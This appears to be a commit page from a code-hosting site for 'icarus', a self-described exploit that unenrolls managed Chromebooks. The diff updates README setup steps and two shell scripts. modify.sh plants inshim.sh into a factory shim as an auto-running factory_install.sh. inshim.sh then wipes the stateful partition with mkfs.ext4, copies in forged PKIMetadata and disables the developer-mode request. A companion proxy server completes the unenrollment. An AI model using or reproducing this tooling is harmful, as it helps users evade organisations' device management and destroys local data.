kxtzownsu/icarus
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #7 from MunyDev/dev

Browse Source 
Make inshim.sh run fully automatically
This commit is contained in:
Archimax 2025-01-26 17:18:57 -05:00 committed by GitHub
commit e705ca5d7c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 36 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
README.md
View File

@ -12,12 +12,15 @@ An exploit for Chrome devices which allows people to unenroll devices with devic
## Setup and installation instructions ## Setup and installation instructions
Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it. Clone the repo with ``git clone --recursive https://github.com/MunyDev/icarus/`` and change directory to it.
Set up the environment by running the following commands (Make sure you have both python3 and python3-venv installed beforehand): Set up the environment by running the following commands (Make sure you have python3, python3-venv, and protobuf installed beforehand):
- `make setup-venv` - `make setup-venv`
- `make enter-venv` - `make enter-venv`
- `make setup-python` - `make setup-python`
- `make build-packed-data` - `make build-packed-data`
Before continuing, open Chrome on your build machine and go to chrome://components. Press CTRL + F and search for "PKIMetadata". Once you find it, press "Check for Updates". Make sure it says up-to-date before continuing (and that the version is below 2000.)
- `bash get_original_data.sh` - `bash get_original_data.sh`
- `bash make_out.sh myCA.der` - `bash make_out.sh myCA.der`
@ -27,11 +30,7 @@ Now, to modify the shim with the generated PKIMetadata:
- `bash modify.sh <shim path>` - `bash modify.sh <shim path>`
Now boot the shim, and in the terminal of the shim, run these commands: Now boot the shim, and ICARUS will attempt to modify your stateful partition.
`mount /dev/disk/by-label/STATE /mnt/stateful_partition`
`bash /mnt/stateful_partition/usr/bin/inshim.sh`
### Server setup ### Server setup
Requirements: npm, node Requirements: npm, node
@ -44,6 +43,21 @@ Reboot the device. You'll boot into verified mode. Once you have your server run
- Set HTTPS IP to the IP you used to host the proxy server. - Set HTTPS IP to the IP you used to host the proxy server.
- Resume setup and your device will unenroll. - Resume setup and your device will unenroll.
## Troubleshooting
<details>
<summary>During building, everything starting from root was copied into original!</summary>
Please run ``git pull`` on your local copy. This bug has been fixed.
</details>
<details>
<summary>My device says "Can't reach Google"!</summary>
- Make sure your device and the server are connected to the same network
- If that didn't work, powerwash your device and re-run the modified shim, and keep the server running.
</details>
## Credits ## Credits
- [MunyDev](https://github.com/MunyDev) - Creating this exploit - [MunyDev](https://github.com/MunyDev) - Creating this exploit
- [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes - [Archimax](https://github.com/EnterTheVoid-x86) - Cleaning up get_original_data.sh and inshim.sh + README changes

19
inshim.sh
View File

@ -1,6 +1,11 @@
#!/bin/bash #!/bin/bash
[ "$EUID" -ne 0 ] && echo "Run this as root" [ "$EUID" -ne 0 ] && fail "Not running as root, this shouldn't happen! Failing."
fail() {
printf "%b\n" "$*" >&2 || :
sleep 1d
}
get_largest_cros_blockdev() { get_largest_cros_blockdev() {
local largest size dev_name tmp_size remo local largest size dev_name tmp_size remo
@ -31,15 +36,17 @@ format_part_number() {
mount /dev/disk/by-label/STATE /mnt/stateful_partition/ mount /dev/disk/by-label/STATE /mnt/stateful_partition/
cros_dev="$(get_largest_cros_blockdev)" cros_dev="$(get_largest_cros_blockdev)"
if [ -z "$cros_dev" ]; then if [ -z "$cros_dev" ]; then
echo "No CrOS SSD found on device. Failing." echo "No CrOS SSD found on device. Failing."
exit 1 sleep 1d
fi fi
stateful=$(format_part_number "$cros_dev" 1) stateful=$(format_part_number "$cros_dev" 1)
mkfs.ext4 -F "$stateful" # This only wipes the stateful partition mkfs.ext4 -F "$stateful" || fail "Failed to wipe stateful." # This only wipes the stateful partition
mount "$stateful" /tmp mount "$stateful" /tmp || fail "Failed to mount stateful."
mkdir -p /tmp/unencrypted mkdir -p /tmp/unencrypted
cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf cp /mnt/stateful_partition/usr/share/packeddata/. /tmp/unencrypted/ -rvf
chown 1000 /tmp/unencrypted/PKIMetadata -R chown 1000 /tmp/unencrypted/PKIMetadata -R
rm /tmp/.developer_mode rm /tmp/.developer_mode
umount /tmp umount /tmp
crossystem disable_dev_request=1 crossystem disable_dev_request=1 || fail "Failed to set disable_dev_request."
read -p "Finished! Press enter to reboot."
reboot

4
modify.sh
View File

@ -84,11 +84,11 @@ mount -o rw "$LOOP_DEV"p1 "$MOUNT_DIR"
mkdir -p "$MOUNT_DIR/usr/share/packeddata" mkdir -p "$MOUNT_DIR/usr/share/packeddata"
cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata" cp -rvf "./out/." "$MOUNT_DIR/usr/share/packeddata"
mkdir -p "$MOUNT_DIR"/usr/bin mkdir -p "$MOUNT_DIR"/usr/bin
cp "inshim.sh" "$MOUNT_DIR/usr/bin/inshim.sh"
umount "$MOUNT_DIR" umount "$MOUNT_DIR"
enable_rw_mount "$LOOP_DEV"p3 enable_rw_mount "$LOOP_DEV"p3
mount "$LOOP_DEV"p3 "$MOUNT_DIR" mount "$LOOP_DEV"p3 "$MOUNT_DIR"
echo "bash" > "$MOUNT_DIR/usr/sbin/factory_install.sh" cp "inshim.sh" "$MOUNT_DIR/usr/sbin/factory_install.sh"
chmod +x "$MOUNT_DIR/usr/sbin/factory_install.sh"
umount "$MOUNT_DIR" umount "$MOUNT_DIR"
sync sync